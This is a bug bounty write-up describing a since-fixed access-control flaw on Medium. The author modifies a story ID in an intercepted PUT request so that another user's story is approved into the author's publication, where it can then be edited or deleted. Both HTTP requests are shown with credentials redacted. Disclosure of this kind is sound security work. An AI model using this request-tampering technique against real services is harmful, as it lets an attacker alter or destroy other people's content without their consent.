Update and Delete any Story of any user on Medium

Before the end of this year, Two well-known people was hacked. Mark Zuckerberg (CEO) of Facebook and Sundar Pichai (CEO) of Google and I was thinking what if it’s time for me to hack Barack Obama. But, I know that isn’t easy.

So, I decided to use my big brain to think my way out!Looking for a new angle… Then, I found the “Request Story” button hiding in the ‘ellipsis’ or ‘more’ icon.

But, there’s a problem. They, need to approve my request to add their story into my publication and that’s absolutely impossible. But apparently, I can add my own story into my publication without further ado.

First step of adding a story to publication.

Second and Last step is to choose a publication where you want to add the story.

My goal here is to add any story of another user into my publication without their consent and I did that using the “Add story to publication” button.

While I’m adding my own story to my publication, I intercepted the HTTP Request to modify the story ID.

My Story ID: 2a4b6810c12dStory ID of the target: 1a3b579c101a

The HTTP Request:

PUT /testphzxc/2a4b6810c12d HTTP/1.1Host: medium.comConnection: keep-aliveContent-Length: 25Accept: application/jsonOrigin: https://medium.comX-XSRF-Token: {Redacted}X-Obvious-CID: webUser-Agent: {Redacted}Content-Type: application/jsonReferer: {Redacted}Accept-Encoding: gzip, deflate, sdch, brAccept-Language: en-US,en;q=0.8,nb;q=0.6Cookie: {Redacted}

{“postStatus”:”APPROVED”}

In the line where the PUT method is located, you will see the ID of my story. And I will remove that ID and put the ID of the target’s story.

Updated HTTP Request:

PUT /testphzxc/1a3b579c101a HTTP/1.1Host: medium.comConnection: keep-aliveContent-Length: 25Accept: application/jsonOrigin: https://medium.comX-XSRF-Token: {Redacted}X-Obvious-CID: webUser-Agent: {Redacted}Content-Type: application/jsonReferer: {Redacted}Accept-Encoding: gzip, deflate, sdch, brAccept-Language: en-US,en;q=0.8,nb;q=0.6Cookie: {Redacted}

{“postStatus”:”APPROVED”}

Of course, like what I’ve just mentioned above, the story will automatically added to my publication without their consent. That is because of:

{“postStatus”:”APPROVED”}

Then *Poof*. The Target’s story was added to my publication.

Now What? Because the story was added to my publication, I am now able to edit his/her story or delete it.

Well, instead of attacking Mr. Obama’s blog, I reported it to Medium. They fixed it and rewarded me with a $250 bounty but I want more because I found multiple bugs in my report. First, Bypass the Request Story and Two, Update and Delete any story. Then, they added the previous bounty with a $100 bounty for a total of $350 bounty.